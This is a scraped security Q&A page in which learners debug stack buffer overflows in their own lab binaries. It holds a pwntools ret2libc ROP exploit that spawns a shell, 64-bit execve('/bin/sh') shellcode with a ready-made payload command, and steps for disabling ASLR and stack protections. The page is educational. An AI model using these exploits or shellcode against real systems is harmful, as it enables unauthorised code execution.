Buffer Overflow - Looking for help for an ROP issue - security

I am currently applying (learning purpose) this tutorial about a ROP-based buffer overflow inside my Kali VM, however I'm unable to reproduce the same behavior and get a shell.
I'm currently debugging with Peda GDB and have seen strange things such as a SIGSEGV fault.
I'm a beginner and don't feel comfortable with some points:
Does my EIP during the SIGSEGV is correct ? It looks like to be not in vmmap ranges (0x7... instead of 0x8...).
Moreover "Leak scanf" has a strange value interpreted as string "JHmp".
Why there are values in my stack between gadget_pop_ebx and /bin/bash instead of just padding+leak_system+gadget_pop_ebx+leak_binsh?
In comments someone said he had an issue with scanf interpreting space 0x20, but after checking address I think I'm not concerned. Just maybe "Leak scanf" has 0x0a in the address could generate an error?
Could you help me to understand why it doesn't work?
I have attached screenshots with values of the stack, registers, etc. to help your understanding (The GDB break is located to the RET of vuln() function to follow the ROP chain with the overwriting of "saved eip").
Update 2 - It works fine now:
I have updated my libc and now it works, but I'm still interested if someone found why it didn't work before update?
Breakpoint 1, 0x080491b1 in vuln ()
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0x41414141 ('AAAA')
ECX: 0xf7f2d380 --> 0x20002
EDX: 0xf7fa1000 --> 0x1ead6c
ESI: 0x1
EDI: 0x8049060 (<_start>: xor ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffe2b79c --> 0xf7dfad00 (<system>: call 0xf7efb1ed)
EIP: 0x80491b1 (<vuln+63>: ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80491ac <vuln+58>: nop
0x80491ad <vuln+59>: mov ebx,DWORD PTR [ebp-0x4]
0x80491b0 <vuln+62>: leave
=> 0x80491b1 <vuln+63>: ret
0x80491b2 <main>: push ebp
0x80491b3 <main+1>: mov ebp,esp
0x80491b5 <main+3>: and esp,0xfffffff0
0x80491b8 <main+6>: call 0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffe2b79c --> 0xf7dfad00 (<system>: call 0xf7efb1ed)
0004| 0xffe2b7a0 --> 0x804901e (<_init+30>: pop ebx)
0008| 0xffe2b7a4 --> 0xf7f45c42 ("/bin/sh")
0012| 0xffe2b7a8 --> 0x41414100 ('')
0016| 0xffe2b7ac --> 0xf7dd4900 (<__libc_start_main+224>: and al,0x80)
0020| 0xffe2b7b0 --> 0x1
0024| 0xffe2b7b4 --> 0xffe2b854 --> 0xffe2c3c5 ("./testrop")
0028| 0xffe2b7b8 --> 0xffe2b85c --> 0xffe2c3cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x080491b1 in vuln ()
As you can see the stack is now good with the ROP chain and indeed i got a shell after.
Update 1 - Code added:
Vulnerable code:
#include <stdlib.h>
#include <stdio.h>
void vuln()
{
char buffer[64];
printf("Input: \n");
scanf("%s",buffer);
}
int main(int argc, char **argv)
{
vuln();
}
Expoit Code:
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context(arch='i386')
p = 0
b = ELF('./testrop')
libc = ELF('/lib/i386-linux-gnu/libc.so.6') # "info sharedlibrary" sous gdb pour connaître le chemin de votre libc
DEBUG = True
def wait(until):
buf=p.recvuntil(until)
if(DEBUG):
print buf
return buf
def start():
global p, libc, b
if p is not 0:
p.close()
p=gdb.debug('./testrop', '''
break *0x080491b1
c
c
''')
#p=process(["strace","-o","strace.out","./testrop"])
wait("Input:")
# pwntools permet de récupérer les adresses directement dans le binaire sans avoir à les chercher via objdump :
addrmain = b.symbols['main']
pr = 0x0804901e # pop ebx ; ret
gotscanf = b.symbols['got.__isoc99_scanf']
pltputs = b.symbols['puts']
padding="A"*76
start()
log.info("Construct ropchain")
log.info("Leak got pltputs: "+str(hex(pltputs)))
log.info("Leak gotscanf: "+str(hex(gotscanf)))
log.info("Leak main: "+str(hex(addrmain)))
log.info("Get shell")
ropchain=padding+p32(pltputs)+p32(pr)+p32(gotscanf)+p32(addrmain)
log.info("Get scanf leak")
p.sendline(ropchain)
leak=wait('Input:')
leak_scanf = u32(leak[2:6])
leak_system = leak_scanf - libc.symbols['__isoc99_scanf'] + libc.symbols['system']
leak_binsh = leak_scanf - libc.symbols['__isoc99_scanf'] +next(libc.search('/bin/sh\x00'))
log.info("Leak got scanf: "+str(hex(leak_scanf)))
log.info("Leak system: "+str(hex(leak_system)))
log.info("Leak /bin/sh: "+str(hex(leak_binsh)))
log.info("Get shell")
ropchain=padding+p32(leak_system)+p32(pr)+p32(leak_binsh)
p.sendline(ropchain)
# Interactive shell
p.interactive()
Exploit script started:
kali#kali:~/Scripts/ROP$ python exploit.py
[*] '/home/kali/Scripts/ROP/testrop'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[*] '/lib/i386-linux-gnu/libc.so.6'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/usr/bin/gdbserver': pid 42163
[*] running in new terminal: ['/usr/bin/gdb', '-q', './testrop', '-x', '/tmp/pwngybPZs.gdb']
Input:
[*] Construct ropchain
[*] Leak got pltputs: 0x8049030
[*] Leak gotscanf: 0x804c014
[*] Leak main: 0x80491b2
[*] Get shell
[*] Get scanf leak
�_��
Input:
[*] Leak got scanf: 0xf7d45fd0
[*] Leak system: 0xf7d35d00
[*] Leak /bin/sh: 0xf7e80c42
GDB Breakpoint:
Reading symbols from ./testrop...
(No debugging symbols found in ./testrop)
Reading /lib/ld-linux.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib/ld-linux.so.2 from remote target...
Reading /lib/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /lib/.debug/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /usr/lib/debug//lib/093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading /usr/lib/debug/lib//093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
Reading target:/usr/lib/debug/lib//093de31180bce97b70c3d2a419921922b3e708.debug from remote target...
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x0
ECX: 0x0
EDX: 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x0
ESP: 0xffce1000 --> 0x1
EIP: 0xf7f06070 (mov eax,esp)
EFLAGS: 0x200 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xf7f06064: lea esi,[esi+eiz*1+0x0]
0xf7f0606b: lea esi,[esi+eiz*1+0x0]
0xf7f0606f: nop
=> 0xf7f06070: mov eax,esp
0xf7f06072: sub esp,0xc
0xf7f06075: push eax
0xf7f06076: call 0xf7f06dc0
0xf7f0607b: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffce1000 --> 0x1
0004| 0xffce1004 --> 0xffce13c5 ("./testrop")
0008| 0xffce1008 --> 0x0
0012| 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
0016| 0xffce1010 --> 0xffce13df ("SESSION_MANAGER=local/kali:#/tmp/.ICE-unix/819,unix/kali:/tmp/.ICE-unix/819")
0020| 0xffce1014 --> 0xffce142b ("WINDOWID=0")
0024| 0xffce1018 --> 0xffce1436 ("QT_ACCESSIBILITY=1")
0028| 0xffce101c --> 0xffce1449 ("COLORTERM=truecolor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0xf7f06070 in ?? () from target:/lib/ld-linux.so.2
Breakpoint 1 at 0x80491b1
Reading /lib/i386-linux-gnu/libc.so.6 from remote target...
Reading /lib/i386-linux-gnu/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...
Reading /lib/i386-linux-gnu/.debug/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...
Reading /usr/lib/debug//lib/i386-linux-gnu/dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...
Reading /usr/lib/debug/lib/i386-linux-gnu//dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...
Reading target:/usr/lib/debug/lib/i386-linux-gnu//dadb99b149405fa7330a0e08569295b4e91517.debug from remote target...
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0x41414141 ('AAAA')
ECX: 0xf7e68380 --> 0x20002
EDX: 0xf7edc000 --> 0x1ead6c
ESI: 0x1
EDI: 0x8049060 (<_start>: xor ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffce0f4c --> 0x8049030 (<puts#plt>: jmp DWORD PTR ds:0x804c00c)
EIP: 0x80491b1 (<vuln+63>: ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80491ac <vuln+58>: nop
0x80491ad <vuln+59>: mov ebx,DWORD PTR [ebp-0x4]
0x80491b0 <vuln+62>: leave
=> 0x80491b1 <vuln+63>: ret
0x80491b2 <main>: push ebp
0x80491b3 <main+1>: mov ebp,esp
0x80491b5 <main+3>: and esp,0xfffffff0
0x80491b8 <main+6>: call 0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffce0f4c --> 0x8049030 (<puts#plt>: jmp DWORD PTR ds:0x804c00c)
0004| 0xffce0f50 --> 0x804901e (<_init+30>: pop ebx)
0008| 0xffce0f54 --> 0x804c014 --> 0xf7d45fd0 (<__isoc99_scanf>: call 0xf7e361e9)
0012| 0xffce0f58 --> 0x80491b2 (<main>: push ebp)
0016| 0xffce0f5c --> 0xf7d0f900 (<__libc_start_main+224>: and al,0x80)
0020| 0xffce0f60 --> 0x1
0024| 0xffce0f64 --> 0xffce1004 --> 0xffce13c5 ("./testrop")
0028| 0xffce0f68 --> 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x080491b1 in vuln ()
[----------------------------------registers-----------------------------------]
EAX: 0x1
EBX: 0x41414141 ('AAAA')
ECX: 0xf7e68380 --> 0x20002
EDX: 0xf7edc000 --> 0x1ead6c
ESI: 0x1
EDI: 0x8049060 (<_start>: xor ebp,ebp)
EBP: 0x41414141 ('AAAA')
ESP: 0xffce0f4c --> 0xf7d35d00 (<system>: call 0xf7e361ed)
EIP: 0x80491b1 (<vuln+63>: ret)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x80491ac <vuln+58>: nop
0x80491ad <vuln+59>: mov ebx,DWORD PTR [ebp-0x4]
0x80491b0 <vuln+62>: leave
=> 0x80491b1 <vuln+63>: ret
0x80491b2 <main>: push ebp
0x80491b3 <main+1>: mov ebp,esp
0x80491b5 <main+3>: and esp,0xfffffff0
0x80491b8 <main+6>: call 0x80491ce <__x86.get_pc_thunk.ax>
[------------------------------------stack-------------------------------------]
0000| 0xffce0f4c --> 0xf7d35d00 (<system>: call 0xf7e361ed)
0004| 0xffce0f50 --> 0x804901e (<_init+30>: pop ebx)
0008| 0xffce0f54 --> 0x8040042
0012| 0xffce0f58 ("AAAA")
0016| 0xffce0f5c --> 0xf7d0f900 (<__libc_start_main+224>: and al,0x80)
0020| 0xffce0f60 --> 0x1
0024| 0xffce0f64 --> 0xffce1004 --> 0xffce13c5 ("./testrop")
0028| 0xffce0f68 --> 0xffce100c --> 0xffce13cf ("SHELL=/bin/bash")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 1, 0x080491b1 in vuln ()
Exploit Python code:
Disassembler RET:
Protections:
SIGSEGV:

Related

How can I find a proper DWARF symbol for address in a Linux kernel module?

I have a kernel module with DWARF debug info. All its ELF sections have zero start addresses.
Its DWARF info contains multiple overlapping code and data symbols. It also has many compilation units with zero DW_AT_low_pc address.
Is there a way to find the right DWARF symbol for a certain location in the binary file?
It also has many compilation units with zero DW_AT_low_pc address.
A kernel module is just a ET_REL object file. The kernel knows how to link it in into its address space.
The reason DW_AT_low_pcs are all 0s is because there are relocation entries that would have told the ld how to relocate them iff ld was to perform the link.
You could examine these entries with readelf -Wr module.ko, but it's much easier to ask GDB to do so.
Example:
// f.c
int foo(int x)
{
return x;
}
int bar(int x)
{
return foo(x);
}
gcc -c -g f.c -ffunction-sections
Resulting f.o has everything at 0:
nm f.o
0000000000000000 T bar
0000000000000000 T foo
readelf -wi f.o | grep low_pc
<1d> DW_AT_low_pc : 0x0
<35> DW_AT_low_pc : 0x0
<6c> DW_AT_low_pc : 0x0
But when loaded into GDB, you can see relocated entries (because GDB knows how to apply them):
gdb -q f.o
Reading symbols from f.o...
(gdb) p &foo
$1 = (int (*)(int)) 0x0 <foo>
(gdb) p &bar
$2 = (int (*)(int)) 0xc <bar> <<=== not 0
(gdb) disas/s foo
Dump of assembler code for function foo:
f.c:
2 {
0x0000000000000000 <+0>: push %rbp
0x0000000000000001 <+1>: mov %rsp,%rbp
0x0000000000000004 <+4>: mov %edi,-0x4(%rbp)
3 return x;
0x0000000000000007 <+7>: mov -0x4(%rbp),%eax
4 }
0x000000000000000a <+10>: pop %rbp
0x000000000000000b <+11>: retq
End of assembler dump.
(gdb) disas/s bar
Dump of assembler code for function bar:
f.c:
7 {
0x000000000000000c <+0>: push %rbp
0x000000000000000d <+1>: mov %rsp,%rbp
0x0000000000000010 <+4>: sub $0x8,%rsp
0x0000000000000014 <+8>: mov %edi,-0x4(%rbp)
8 return foo(x); <<=== correct line
0x0000000000000017 <+11>: mov -0x4(%rbp),%eax
0x000000000000001a <+14>: mov %eax,%edi
0x000000000000001c <+16>: callq 0x21 <bar+21>
9 }
0x0000000000000021 <+21>: leaveq
0x0000000000000022 <+22>: retq
End of assembler dump.

x86_64 callback sigsegv debugging

Please let me know if there is more information I need to enter. The stackexchange robot seems to think there is not enough of it here.
The below stack trace is generated as a result of a an invalid callback pointer. I'd like to understand where the callback occurred in the code. I know how to do this in MIPS, but not in Intel architecture.
I get the following backtrace on sigsegv:
(gdb) bt
#0 0x000000361f20cc5a in ?? ()
Cannot access memory at address 0x7f382f1e1810
(gdb)
When I try to disassemble I get:
(gdb) disassemble
No function contains program counter for selected frame.
(gdb) info reg
rax 0x7f2bf3fb8790 139826753669008
rbx 0x7f3200197520 139852726760736
rcx 0x7f3200197540 139852726760768
rdx 0x0 0
rsi 0x7f2bf3fb87b0 139826753669040
rdi 0x0 0
rbp 0x7f2bf3fb87b0 0x7f2bf3fb87b0
rsp 0x7f382f1e1810 0x7f382f1e1810
r8 0x20000 131072
r9 0x453d780 72603520
r10 0x27 39
r11 0x7f2dcbfa9ec8 139834672455368
r12 0x7f2bf3fb87b0 139826753669040
r13 0x7f3196fd2790 139850963298192
r14 0x7f2c080008c0 139827089508544
r15 0xfffffffffffffe68 -408
rip 0x361f20cc5a 0x361f20cc5a
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
Processor information:
Intel(R) Xeon(R) CPU E5-2658A v3 # 2.20GHz

Solving mprotect() syscall failure

I'm writing some ROP exploit code that calls mprotect via a syscall, after invoking int 0x80 eax is set to 0x0 indicating a success. Shifting execution to the target address still results in a SIGSEGV. I would love for someone to show me where I go wrong.
Some details, target address is the .data section, this is where I'll be writing by shellcode to:
[20] 0x8146820->0x814c2b8 at 0x000fd820: .data ALLOC LOAD DATA HAS_CONTENTS
I set eax to 125, ebx to the page boundary 0x8146000, ecx to 0x1000 (4096 page size) and edx to 0x7 (RWX).
Just before the syscall the registers look like this:
eax 0x7d 125
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0182 0x80c0182 <mprotect+18>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) disas $eip, $eip+20
Dump of assembler code from 0x80c0182 to 0x80c0196:
=> 0x080c0182 <mprotect+18>: int $0x80
0x080c0184 <mprotect+20>: pop %ebx
0x080c0185 <mprotect+21>: cmp $0xfffff001,%eax
0x080c018a <mprotect+26>: jae 0x80c7d80 <__syscall_error>
0x080c0190 <mprotect+32>: ret
and after the syscall the registers are:
(gdb) si
0x080c0184 in mprotect ()
(gdb) i r
eax 0x0 0
ecx 0x1000 4096
edx 0x7 7
ebx 0x8146000 135553024
esp 0xbffff2b0 0xbffff2b0
ebp 0x8d0e0f0 0x8d0e0f0
esi 0x804fb85 134544261
edi 0x43434343 1128481603
eip 0x80c0184 0x80c0184 <mprotect+20>
eflags 0x202 [ IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
However the memory location does not show a change in permissions and attempting to execute instructions there terminates the application:
(gdb) x/4x 0x8146820
0x8146820: 0x00000000 0x00000000 0x08146154 0x0000ea60
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x08146820 in data_start ()
Any suggestions on how/what to debug or what I'm doing wrong are welcome.
Edit
I ran it under strace without the debugger attached, seems like the mprotect call is a success, yet execution fails:
stat64("/etc/localtime", {st_mode=S_IFREG|0644, st_size=2197, ...}) = 0
mprotect(0x8146000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0} ---
+++ killed by SIGSEGV (core dumped) +++
Confirming crash address from core:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x08146820 in data_start ()
Your mprotect call worked. The program crashes because 0x8146820 holds
0x0000, which disassembles to add [eax], al, and eax holds zero. But address 0 is not mapped. (That's why the segfault is at si_addr=0)

Buffer overflows on 64 bit

I am trying to do some experiments with buffer overflows for fun. I was reading on this forum on the topic, and tried to write my own little code.
So what I did is a small "C" program, which takes character argument and runs until segmentation fault.
So I supply arguments until I get a message that I overwrote the return address with "A" which is 41. My buffer character length, in which I copy my input strings is [5].
Here is what I did in gdb.
run $(perl -e 'print "A"x32 ; ')
Program received signal SIGSEGV, Segmentation fault.
0x0000000000400516 in main (argc=Cannot access memory at address 0x414141414141412d
Then I figured out that it takes 16 'A' to overwrite.
run $(perl -e 'print "A"x16 . "C"x8 . "B"x32 ; ')
0x0000000000400516 in main (argc=Cannot access memory at address 0x434343434343432f
)
Which tells us that the 8 "C" are overwriting the return address.
According to the online tutorials if I supply a valid adress instead of the 8 "C". I can jump to some place and execute code. So I overloaded the memory after the initial 16 "A".
The next step was to execute
run $(perl -e 'print "A"x16 . "C"x8 . "B"x200 ; ')
rax 0x0 0
rbx 0x3a0001bbc0 249108216768
rcx 0x3a00552780 249113683840
rdx 0x3a00553980 249113688448
rsi 0x42 66
rdi 0x2af9e57710e0 47252785008864
rbp 0x4343434343434343 0x4343434343434343
rsp 0x7fffb261a2e8 0x7fffb261a2e8
r8 0xffffffff 4294967295
r9 0x0 0
r10 0x22 34
r11 0xffffffff 4294967295
r12 0x0 0
r13 0x7fffb261a3c0 140736186131392
r14 0x0 0
r15 0x0 0
rip 0x400516 0x400516 <main+62>
eflags 0x10206 [ PF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fctrl 0x37f 895
fstat 0x0 0
ftag 0xffff 65535
fiseg 0x0 0
fioff 0x0 0
foseg 0x0 0
fooff 0x0 0
fop 0x0 0
mxcsr 0x1f80 [ IM DM ZM OM UM PM ]
After examining the memory 200 bytes after $rsp i found an address and I did the following:
run $(perl -e 'print "A"x16 . "\x38\xd0\xcb\x9b\xff\x7f" . "\x90"x50 . "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" ; ')
This however does not do anything. I would be grateful if someone can give me an idea what am I doing wrong.
First make sure that you change the randomize_va_space. On Ubuntu you would run the following as root
echo 0 > /proc/sys/kernel/randomize_va_space
Next make sure you are compiling the test program without stack smashing protection and set the memory execution bit. Compile it with the following gcc options to accomplish
-fno-stack-protector -z execstack
Also I found I needed more space to actually execute a shell so I would change your buffer to something more like buffer[64]
Next you can run the app in gdb and get the stack address you need to return to
First set a breakpoint right after the strcpy
(gdb) disassemble main
Dump of assembler code for function main:
0x000000000040057c <+0>: push %rbp
0x000000000040057d <+1>: mov %rsp,%rbp
0x0000000000400580 <+4>: sub $0x50,%rsp
0x0000000000400584 <+8>: mov %edi,-0x44(%rbp)
0x0000000000400587 <+11>: mov %rsi,-0x50(%rbp)
0x000000000040058b <+15>: mov -0x50(%rbp),%rax
0x000000000040058f <+19>: add $0x8,%rax
0x0000000000400593 <+23>: mov (%rax),%rdx
0x0000000000400596 <+26>: lea -0x40(%rbp),%rax
0x000000000040059a <+30>: mov %rdx,%rsi
0x000000000040059d <+33>: mov %rax,%rdi
0x00000000004005a0 <+36>: callq 0x400450 <strcpy#plt>
0x0000000000**4005a5** <+41>: lea -0x40(%rbp),%rax
0x00000000004005a9 <+45>: mov %rax,%rsi
0x00000000004005ac <+48>: mov $0x400674,%edi
0x00000000004005b1 <+53>: mov $0x0,%eax
0x00000000004005b6 <+58>: callq 0x400460 <printf#plt>
0x00000000004005bb <+63>: mov $0x0,%eax
0x00000000004005c0 <+68>: leaveq
0x00000000004005c1 <+69>: retq
End of assembler dump.
(gdb) b *0x4005a5
Breakpoint 1 at 0x4005a5
Then run the app and at the break point grab the rax register address.
(gdb) run `python -c 'print "A"*128';`
Starting program: APPPATH/APPNAME `python -c 'print "A"*128';`
Breakpoint 1, 0x00000000004005a5 in main ()
(gdb) info register
rax 0x7fffffffe030 140737488347136
rbx 0x0 0
rcx 0x4141414141414141 4702111234474983745
rdx 0x41 65
rsi 0x7fffffffe490 140737488348304
rdi 0x7fffffffe077 140737488347255
rbp 0x7fffffffe040 0x7fffffffe040
rsp 0x7fffffffdff0 0x7fffffffdff0
r8 0x7ffff7dd4e80 140737351863936
r9 0x7ffff7de9d60 140737351949664
r10 0x7fffffffdd90 140737488346512
r11 0x7ffff7b8fd60 140737349483872
r12 0x400490 4195472
r13 0x7fffffffe120 140737488347424
r14 0x0 0
r15 0x0 0
rip 0x4005a5 0x4005a5 <main+41>
eflags 0x206 [ PF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb)
Next determine your max buffer size. I know that the buffer of 64 crashes at 72 bytes so I will just go from that.. You could use something like metasploits pattern methods to give you this or just figure it out from trial and error running the app to find out the exact byte count it takes before getting a segfault or make up a pattern of your own and match the rip address like you would with the metasploit pattern option.
Next, there are many different ways to get the payload you need but since we are running a 64bit app, we will use a 64bit payload. I compiled C and then grabbed the ASM from gdb and then made some changes to remove the \x00 chars by changing the mov instructions to xor for the null values and then shl and shr to remove them from the shell command. We will show this later but for now the payload is as follows.
\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05
our payload here is 48 bytes so we have 72 - 48 = 24
We can pad the payload with \x90 (nop) so that instruction will not be interrupted. Ill add 2 at the end of the payload and 22 at the beginning. Also I will tack on the return address that we want to the end in reverse giving the following..
`python -c 'print "\x90"*22+"\x48\x31\xd2\x48\x89\xd6\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe7\x08\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\xb8\x3b\x11\x11\x11\x11\x11\x11\x11\x48\xc1\xe0\x38\x48\xc1\xe8\x38\x0f\x05\x90\x90\x30\xe0\xff\xff\xff\x7f"';`
Now if you want to run it outside of gdb, you may have to fudge with the return address. In my case the address becomes \x70\xe0\xff\xff\xff\x7f outside of gdb. I just increased it until it worked by going to 40 then 50 then 60 then 70..
test app source
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char name[64];
strcpy(name, argv[1]);
printf("Arg[1] is :%s\n", name);
return 0;
}
This is the payload in C
#include <stdlib.h>
int main()
{
execve("/bin/sh", NULL, NULL);
}
And payload in ASM which will build and run
int main() {
__asm__(
"mov $0x0,%rdx\n\t" // arg 3 = NULL
"mov $0x0,%rsi\n\t" // arg 2 = NULL
"mov $0x0068732f6e69622f,%rdi\n\t"
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack pointer = start of /bin/sh
"mov $0x3b,%rax\n\t" // syscall number = 59
"syscall\n\t"
);
}
And since we can't use \x00 we can change to xor the values and do some fancy shifting to remove the bad values of the mov for setting up /bin/sh
int main() {
__asm__(
"xor %rdx,%rdx\n\t" // arg 3 = NULL
"mov %rdx,%rsi\n\t" // arg 2 = NULL
"mov $0x1168732f6e69622f,%rdi\n\t"
"shl $0x8,%rdi\n\t"
"shr $0x8,%rdi\n\t" // first byte = 0 (8 bits)
"push %rdi\n\t" // push "/bin/sh" onto stack
"mov %rsp,%rdi\n\t" // arg 1 = stack ptr = start of /bin/sh
"mov $0x111111111111113b,%rax\n\t" // syscall number = 59
"shl $0x38,%rax\n\t"
"shr $0x38,%rax\n\t" // first 7 bytes = 0 (56 bits)
"syscall\n\t"
);
}
if you compile that payload, run it under gdb you can get the byte values you need such as
(gdb) x/bx main+4
0x400478 <main+4>: 0x48
(gdb)
0x400479 <main+5>: 0x31
(gdb)
0x40047a <main+6>: 0xd2
(gdb)
or get it all by doing something like
(gdb) x/48bx main+4
0x4004f0 <main+4>: 0x48 0x31 0xd2 0x48 0x89 0xd6 0x48 0xbf
0x4004f8 <main+12>: 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x11
0x400500 <main+20>: 0x48 0xc1 0xe7 0x08 0x48 0xc1 0xef 0x08
0x400508 <main+28>: 0x57 0x48 0x89 0xe7 0x48 0xb8 0x3b 0x11
0x400510 <main+36>: 0x11 0x11 0x11 0x11 0x11 0x11 0x48 0xc1
0x400518 <main+44>: 0xe0 0x38 0x48 0xc1 0xe8 0x38 0x0f 0x05
Well for starters... Are you entirely sure that the address on the stack is the return pointer and not a pointer to say a data structure or string somewhere? If that is the case it will use that address instead of the string and could just end up doing nothing :)
So check if your function uses local variables as these are put on the stack after the return address. Hope this helps ^_^ And good luck!
i haven't worked with x64 much , but a quick look says you have 16 bytes till rip overwrite.
instead of the \x90 try \xCC's to see if controlled code redirection has occured, if it has gdb should hit(land in the \xCC pool) the \xCC and pause (\xCC are in a way 'hardcoded' breakpoints).

Buffer overflow doesn't run

I try an basic buffer overflow, i overwrite the saved EIP on the stack an jump on to the adress. This adress point to à shell variable who containt my shellcode.
But on gdb, program sigserv on the first nop on the nopslide.
I lauch th program like this command:
gdb-peda$ r $(python -c 'print "A"*22 + "\x5f\xb8\xff\xff"')
I have this trace:
[----------------------------------registers-----------------------------------]
EAX: 0x1a
EBX: 0xf7fc3ff4 --> 0x15dd7c
ECX: 0xffffaf38 --> 0xf7fc44e0 --> 0xfbad2a84
EDX: 0xf7fc5360 --> 0x0
ESI: 0x0
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffaf80 --> 0xffffb100 --> 0xc ('\x0c')
EIP: 0xffffb85f --> 0x90909090
EFLAGS: 0x10296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xffffb85c: nop
0xffffb85d: nop
0xffffb85e: nop
=> 0xffffb85f: nop
0xffffb860: nop
0xffffb861: nop
0xffffb862: nop
0xffffb863: nop
[------------------------------------stack-------------------------------------]
0000| 0xffffaf80 --> 0xffffb100 --> 0xc ('\x0c')
0004| 0xffffaf84 --> 0xf7fef060 (push ebp)
0008| 0xffffaf88 --> 0x80484bb (<__libc_csu_init+11>: add ebx,0x1219)
0012| 0xffffaf8c --> 0xf7fc3ff4 --> 0x15dd7c
0016| 0xffffaf90 --> 0x80484b0 (<__libc_csu_init>: push ebp)
0020| 0xffffaf94 --> 0x0
0024| 0xffffaf98 --> 0xffffb018 --> 0x0
0028| 0xffffaf9c --> 0xf7e7ce46 (<__libc_start_main+230>: mov DWORD PTR [esp],eax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xffffb85f in ?? ()
gdb-peda$ x/i $eip
=> 0xffffb85f: nop
I run on debian wheezy, gcc version is gcc (Debian 4.7.2-4) 4.7.2, gdb version 7.4.1-debian.
Is an new protection on this gcc version? Or other think?
Thanks you. (Sorry for my english :))
You can remove stack protection by following any of these steps:
Illustration of buffer overflows for students (linux, C)

Resources